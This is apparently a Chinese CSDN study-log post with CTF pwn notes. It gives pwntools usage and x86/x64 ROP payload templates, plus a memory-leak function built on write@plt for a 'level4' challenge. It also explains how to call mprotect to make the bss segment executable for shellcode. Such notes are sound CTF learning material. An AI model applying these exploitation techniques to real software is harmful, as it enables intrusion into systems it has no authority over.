日志2019.6.15

最新推荐文章于 2022-04-19 20:02:55 发布
最新推荐文章于 2022-04-19 20:02:55 发布
阅读量260 收藏 1
点赞数
分类专栏: 日志 文章标签: 日志 pwn 网络安全 二进制
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RobinZZX/article/details/92237939
版权

pwn

recvuntil('aaa',drop=True/False)  #drop='True'表示返回的字符串中aaa不保留

x32 payload跳转到函数func()写法
x32地址大小为4位

payload = 'a'*n + p32(func_addr) + <下一跳地址,没有可以用aaaa代替> + p32<参数1> + p32<参数2> + ...

x64 payload跳转到函数func()写法
x64前三个参数通过寄存器rdi、rsi、rdx传参
x64地址大小为8位

payload = 'a'*n + p64(pop语句) + p64<参数1> + p64<参数2> + ... + p64(func_addr)

python自带next()函数:返回下一个可迭代对象,在pwntool中经常和elf.search()配合使用

a = elf.search('binsh')
b = next(a)
print a
print b

输出

<generator object search at 0x7f013b4c4500>
134520868

使用ROPgarget

ROPgadget --binary pwn01 --only "pop|ret"

得到elf文件中函数的地址
1.text代码段有的和plt表项有的,直接elf.sym[‘func’]
2.代码段没有但是文件中有的可以在libc中找 方法是通过plt表项
(注:ida pro中extern段的函数的地址应该不是真正地址)

ELF.sym就是ELF.symbols的缩写

题目提供的libc一般是给你在远程连接的时候用的,本地测试的时候使用ELF.libc即可得到libc

OJ level4
pwntools的leak模块实战

def leak(addr):
    payload = flat(cyclic(0x88), pop_rdi, 1, pop_rsi_p, addr, 0, elf.plt['write'], elf.sym['vulnerable_function'])
    p.recvuntil('Input:\n')
    p.send(payload)
    sleep(0.01)
    leaked = p.recv(8)
    info("leaked -> {}".format(leaked))
    return leaked

多使用线上调试
因为本地的环境和线上的有一定的区别
有时在本地遇到一些奇怪的错误在线上不会遇到 可以直接过的

低端题思路之一:
从得到system()、execve()或者写shellcode到可执行区来getshell

void* mmap(void* addr, size_t len, int port, int flag, int filedes, off_t off) 
int mprotect(void* addr, size_t len, int port)

简单来说mmap函数创建一块内存区域,将一个文件映射到该区域,进程可以像操作内存一样操作文件。mprotect函数可以改变一块内存区域的权限(以页为单位)。至于mmap函数没有想到怎么去利用,而mprotect函数是可以改变一个段的权限的,可以利用这一特点将bss段改为可执行,将shellcode写到bss段,再想办法执行即可。

这里有一点关于mprotect的注意点:mprotect的第一个参数标识要写的内存页的首地址。这里是以页为单位访问。一页是4kb也就是0x1000字节所以mprotect的第一个参数必须是0x1000的倍数。第二个参数标识要设置的权限的地址的范围。这个多少都无所谓,不过需要把bss段包含进去

今日谜题:context.binary = "./level5"有什么用?
解答:自动根据题目文件来设置一些系统相关的全局变量。例如选定的目标操作系统,体系结构和位宽。

在利用__libc_csu_init()的gadget时,由于这个gadget通过call跳转到指定函数,所以要把需要跳转的指定函数绑定到got表上
使用objdump -d ./level5查看__libc_csu_init()上的指令地址

RobinZZX
关注
专栏目录
对send(),recv()函数的全面理解
01-10
int send( SOCKET s, const char FAR *buf, int len, int flags ); 不论是客户还是服务器应用程序都用send函数来向TCP连接的另一端发送数据。 客户程序一般用send函数向服务器发送请求,而服务器则通常用send函数来向客户程序发送应答。 该函数的第一个参数指定发送端套接字描述符; 第二个参数指明一个存放应用程序要发送数据的缓冲区; 第三个参数指明实际要发送的数据的字节数; 第四个参数一般置0。 这里只描述同步Socket的send函数的执行流程。当调用该函数时,send先比较待发送数据的长度len和套接字s的发送缓冲的 长度, 如果
关于addr=u32(r.recvuntil(‘\xf7‘)[-4:])的解释
半岛铁盒的博客
04-15 2028
有时候我们写EXP的时候 对于32位文件ROP 在接收函数地址的时候我们 会用到 addr=u32(r.recv(4)) 但这个命令有时候 会失效,接收不到; 这时候就会用到addr=u32(r.recvuntil('\xf7')[-4:]) 这涉及到个debug调试查看context.log_level="debug" 可以看到我们传入的a字符串结束的地方是0x7C,后面跟着的就是我们泄露出来的write函数的地址,我写的意思是从0x7F(这一行末尾), [-4:]即([::-4])往前截取4字节,得到
xctf攻防世界pwn基础题解(新手食用)
Spwpun的博客
05-01 2万+
文章目录CGFsb status:updating… CGFsb 前面的那一道get_shell的题算是做pwn题的一般流程:下载文件,ida查看代码,分析漏洞,利用漏洞写出exp,最常用的是用到python的pwntools,然后使用nc或者pwntools连接到虚拟场景实现漏洞攻击得到flag。 本题的思路基本一致,使用pwntools编写漏洞利用脚本,这里的漏洞是格式化字符串漏洞,文章分...
[Tools]Pwn中用于远程交互的库函数总结
車鈊的博客
04-19 3357
Pwn中用于远程交互的库函数总结 在比赛当中经常会与端口应用交互的场景, 首先是PWN库的安装和使用, 参考资料:pwntools — pwntools 4.9.0dev documentation 安装 pip install --upgrade pwntools 导入 from pwn import * 简单IO函数 进程创建 p = process('/bin/sh') # 还可以在已经建立的连接,如IP连接和SSH连接上创建进程 # 关闭进程 p.close() 远程连接主机端口 host =
recv 函数用法
skyie的专栏
04-26 2239
int recv( SOCKET s,     char FAR *buf,      int len,     int flags     );    不论是客户还是服务器应用程序都用recv函数从TCP连接的另一端接收数据。 该函数的第一个参数指定接收端套接字描述符; 第二个参数指明一个缓冲区,该缓冲区用来存放recv函数接收到的数据; 第三个参数指明buf的长度;
idea 2019.2.4
04-27
6. **智能代码助手**:IntelliJ IDEA的智能代码助手是其标志性功能之一,2019.2.4可能提升了代码提示的准确性和效率,包括自动完成、代码分析和错误检测。 7. **版本控制集成**:IDE与Git、SVN等版本控制系统的集成...
lombok-intellij-plugin-releasebuild_0.29-2019.3.zip
04-23
6. `@Builder`:提供链式构建器模式,方便创建复杂对象。 7. `@Singular`:配合`@Builder`,处理集合类型的字段,避免重复添加元素的代码。 在IDEA 2019.3中安装Lombok插件的步骤如下: 1. 打开IDEA,进入设置...
Java开发手册(阿里巴巴2019.6.19超清).rar
06-21
所以本手册以 Java 开发者为中心视角,划分为编程规约、异常日志、单元测试、安全规 约、MySQL 数据库、工程结构、设计规约七个维度,再根据内容特征,细分成若干二级子目录。 另外,依据约束力强弱及故障敏感性,...
lombok2018.1-2019.3.zip
08-25
6. `@NonNull`:用于标记字段,当该字段为null时,Lombok会在setter方法中添加null检查并抛出NullPointerException。 7. `@Log`系列:如`@Log4j`、`@Slf4j`等,自动导入相应的日志库并创建一个logger变量,方便进行...
Java开发手册-2019.6.19华山版.pdf
07-08
6. 安全规约的必要性 随着网络安全事件的日益频发,安全规约在软件开发中变得愈发重要。手册中明确了代码中应该注意的安全问题,并提供了相应的规约,以防范潜在的安全风险。 7. MySQL数据库的最佳实践 数据库设计...
2021-05-11
m0_49766582的博客
05-15 122
1 from pwn import* 2 from LibcSearcher import * 3 io=remote('node3.buuoj.cn',26312) 4 elf=ELF("./ciscn_2019_c_1") 5 puts_plt=elf.plt['puts']//等于的是puts.plt的地址 6 puts_got=elf.got['puts'] .
Pwn学习历程(1)--基本工具、交互、调试
Aka丶的博客
12-02 5万+
1、 从基础开始1.1 简单原理介绍以下内容摘自Wiki:   Pwn是一个骇客语法的俚语词,自”own”这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被击败(例如:”You just got pwned!”)。   在骇客行话里,尤其在另外一种电脑技术方面,包
关于 recv函数
CppPlayer
08-31 2381
/* int recv( SOCKET s, char FAR *buf, int len, int flags);(1)recv先等待s的发送缓冲中的数据被协议传送完毕, 如果协议在传送s的发送缓冲中的数据时出现网络错误,那么recv函数返回SOCKET_ERROR,(2)如果s的发送缓冲中没有数据或者数据被协议成功发送完毕后, recv先检查套接字s的接收缓冲区,如果s接收缓冲区中没有
recv函数返回值说明
热门推荐
tiandyoin的专栏
06-11 10万+
recv函数 int recv( SOCKET s, char FAR *buf, int len, int flags); 不论是客户还是服务器应用程序都用recv函数从TCP连接的另一端接收数据。该函数的第一个参数指定接收端套接字描述符; 第二个参数指明一个缓冲区,该缓冲区用来存放recv函数接收到的数据; 第三个参数指明buf的长度; 第四个参数一般置0。 这里只描述同步Socket的
[PWN][补充篇]pwntools的相关知识
网络安全知识分享
03-28 1901
@TOC 0x0 安装 sudo pip install pwntools 0x1 导入包 from pwn import* 0x2 链接远程服务器或者链接本地文件 远程 r = remote(‘目的IP或目标URL’,目标端口号) 本地 r = process('./文件名') 0x3 接收远端回传的数据 interactive() //在取得shell之后使用,直接进行交互,相当于回到shell的模式 recv(numb = 字节大小,timeout = default) //接收指定字节数
(Pwn)CTF工具 ROPgadget 的安装与使用介绍
半岛铁盒的博客
03-10 1万+
一. 介 绍 使用此工具,您可以在二进制文件中搜索Gadgets,以方便您对ROP的利用。 我们知道x86都是靠栈来传递参数的而x64换了它顺序是rdi, rsi, rdx, rcx, r8, r9,(这里6个寄存器可以被理解为Gadgets)如果多于6个参数才会用栈我们要先知道这个特性. 有的题,里面既没有现成的system也没有/bin/sh字符串,也没有提供libc.so给我们,那么我们要做的就是想办法泄露libc地址,拿到system函数和/bin/sh字符串; 我们就需要获取rdi, rsi,
pwn学习(四)
qq_37439229的博客
10-04 272
今天复现了gactf的simulator,lc3的的汇编感觉和mips满像的 pwn方面看了brop,感觉只有盲打有用,感觉对一个re手并不需要,算了就当看看吧 在刷题上,位只能说今天做的三道题都和格式化字符串有关,我都不会(好菜阿),但是学到了很多,不得不说格式化字符串好不熟练阿。。。。 others_baby_stack from pwn import * p = remote('node3.buuoj.cn',28992) #p = process('./main') elf = ELF('./mai
格式化字符串漏洞利用
qq_42192672的博客
10-25 3858
学习资料: https://ctf-wiki.github.io/ctf-wiki/pwn/linux/fmtstr/fmtstr_exploit/                        https://veritas501.space/2017/04/28/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E...
BUUCTF-PWN刷题记录-16
weixin_44145820的博客
05-05 819
目录ciscn_2019_es_5(realloc double free)npuctf_2020_easyheap(off-by-one) ciscn_2019_es_5(realloc double free) 申请没有大小限制,数目上限为10 edit会调用realloc重新申请(其实不会的,因为大小不变) 如果edit就不能show了 看了一下这题没有什么明显漏洞,但是考虑到re...
vivado2019.2安装教程
最新发布
04-04
6. 选择需要安装的组件,包括硬件设计、高层次综合、IP核、系统集成、仿真和可编程逻辑器件驱动程序等。可以根据需要进行选择,然后点击“Next”。 7. 在“License Manager”界面中选择“Create New Account”创建...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值